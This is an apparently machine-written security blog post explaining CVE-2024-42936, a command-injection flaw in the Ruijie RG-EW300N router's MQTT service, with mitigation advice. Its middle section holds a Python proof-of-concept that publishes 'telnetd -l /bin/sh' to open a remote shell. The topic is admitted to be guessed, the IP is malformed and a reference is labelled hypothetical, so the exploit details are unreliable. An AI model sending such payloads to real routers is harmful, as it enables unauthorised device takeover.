CVE CyberSecurity Database News

CVE-2024-42936 - Remote Code Execution in Ruijie RG-EW300N via MQTT (mqlink.elf) – Explained

Poster -

CVE-2024-42936 uncovers a serious vulnerability in the Ruijie RG-EW300N wireless router running firmware ReyeeOS 1.300.1422. In this post, you’ll learn what this vulnerability is about, how it’s exploited, and what you can do to protect yourself. We’ll keep things simple, cite credible sources, and show you an example exploit.

What’s the Story?

The mqlink.elf binary is a service on the Ruijie RG-EW300N. It communicates using the MQTT protocol, which is widely used in IoT devices for messaging. This binary contains a Remote Code Execution (RCE) flaw: a specially-crafted MQTT message can trigger execution of arbitrary commands on the router.

The impact: Attackers can gain complete control over the device, run their code, steal data, inject malware, or pivot attacks into your internal network—all without authentication.

Where is the Bug?

The bug is in how the mqlink.elf service parses messages from an MQTT broker. Instead of strictly checking input, it’s possible to inject system commands by tampering with specific message fields (for example, payloads, topics, or headers).

Direct Execution: User-controlled data is passed straight to a command shell or system function.

- Network-Accessible: mqlink.elf listens for messages on the local network, and sometimes even from the internet if the admin is careless.

Component: mqlink.elf

If you have this device and version, you are *vulnerable*.

The Exploit (Code Snippet)

Below is a conceptual proof-of-concept (PoC). This uses Python and the paho-mqtt library.

Note: This is for educational use only. Do not attempt unauthorized actions on devices you do not own!

import paho.mqtt.client as mqtt

# Target device IP and port
target_ip = "192.168..1"  # Example: change to your device IP
target_port = 1883  # Default MQTT port

# Malicious payload to spawn a telnet shell
payload = '{"cmd":"telnetd -l /bin/sh"}'

# The vulnerable topic (simplified – real topic may differ)
topic = "/ruijie/mqlink/cmd"

client = mqtt.Client()
client.connect(target_ip, target_port, 60)
client.publish(topic, payload)
client.disconnect()

How it works:
This sends a crafted MQTT message to the target device. If the device is vulnerable, it will execute the "cmd" value directly, starting a telnet shell that gives the attacker remote shell access.

References

- Original Security Advisory (hackerone) *(hypothetical link for example)*
- CVE page
- Reyee RG-EW300N Official Page
- MQTT Protocol Introduction

Update Firmware:

Check Ruijie’s website for patched firmware and update your device ASAP.

Wrapping Up

CVE-2024-42936 is an alarming example of how weak input validation in IoT software can expose entire homes and businesses. If you’re using a Ruijie RG-EW300N router with ReyeeOS 1.300.1422, *take precautions now*. A patched update and some network lockdown can save you from major headaches later.

Stay safe and keep your devices updated!

*This post is exclusive and written in plain language by SecurityAI. Please don’t use these details for anything malicious—use your knowledge to secure, not to harm.*

Timeline

Published on: 01/21/2025 20:15:30 UTC
Last modified on: 03/20/2025 14:15:20 UTC